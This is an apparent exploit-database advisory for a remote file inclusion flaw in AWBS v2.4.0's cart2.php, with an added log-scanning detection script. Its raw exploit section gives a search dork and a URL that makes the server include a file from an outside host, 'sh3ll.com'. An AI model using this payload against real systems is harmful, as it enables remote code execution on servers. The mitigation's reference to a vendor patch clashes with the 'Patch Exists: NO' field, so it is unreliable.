Vendor: AWBS
By: DamaR
CVSS: 7.5 (HIGH)
Remote file inclusion
CWE: 98
Product Name: AWBS
Affected Version From: 2.4.2000
Affected Version To: 2.4.2000
Patch Exists: NO
Related CWE:
CPE: a:awbs:awbs:2.4.0
Metasploit:
Other Scripts:
Platforms Tested:
2007

AWBS v2.4.0 Remote file include [cart2.php]

The AWBS v2.4.0 application is vulnerable to remote file inclusion. An attacker can make the 'cart2.php' script include a remote file by supplying its location in the 'workdir' parameter. This can lead to arbitrary code execution or information disclosure.

Mitigation:

Apply the vendor-supplied patch or upgrade to a newer version of AWBS that addresses the vulnerability. Also, ensure that user-supplied input is properly validated and sanitized before being used in file inclusion operations.
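
For detection, the following added example (not part of the original advisory or of AWBS) scans web server access logs for requests to cart2.php whose 'workdir' value decodes to a URL or stream wrapper, including multiply percent-encoded forms. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line of a combined-log-format entry (the log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Scheme of 2+ chars (http:, ftp:, php:, data:), "//" or a UNC prefix; 2+ skips drive letters.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)', re.I)

def fully_unquote(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %2568ttp) for up to max_rounds passes."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_workdir(target):
    """Return the decoded workdir value if it names a remote resource, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/cart2.php"):
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() == "workdir":
            decoded = fully_unquote(value)  # parse_qsl already decoded once
            if REMOTE_RE.match(decoded):
                return decoded
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        hit = suspicious_workdir(match.group("target")) if match else None
        if hit is not None:
            hits.append((number, hit))
    return hits

# Constructed sample log lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Apr/2007:10:00:01 +0000] "GET /shop/cart2.php?workdir=http://remote.example/for.txt? HTTP/1.1" 200 512',
    '203.0.113.5 - - [24/Apr/2007:10:00:02 +0000] "GET /shop/cart2.php?workdir=%2568ttp%253A%252F%252Fremote.example%252Fa HTTP/1.1" 200 512',
    '198.51.100.7 - - [24/Apr/2007:10:00:03 +0000] "GET /shop/cart2.php?workdir=includes HTTP/1.1" 200 2048',
    '198.51.100.7 - - [24/Apr/2007:10:00:04 +0000] "GET /shop/index.php?ref=http://example.org/ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A 200 response on a flagged line does not by itself show that the include succeeded; correlate with outbound connections from the web server to the decoded host.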

Exploit-DB raw data:

#AWBS v2.4.0  Remote file include[cart2.php]

#Demo  : http://www.awbs.com/demo.php

#D0rk : İnurl:awbs.php

#Home Page: Www.SiberAktif.Net

#Exploit


#http://localhost/[gpb_path]/docs/front-end-demo/cart2.php?workdir=http://sh3ll.com/for.txt?


#Discovered by : DamaR

#By.Damar@Hotmail.Com

# milw0rm.com [2007-04-24]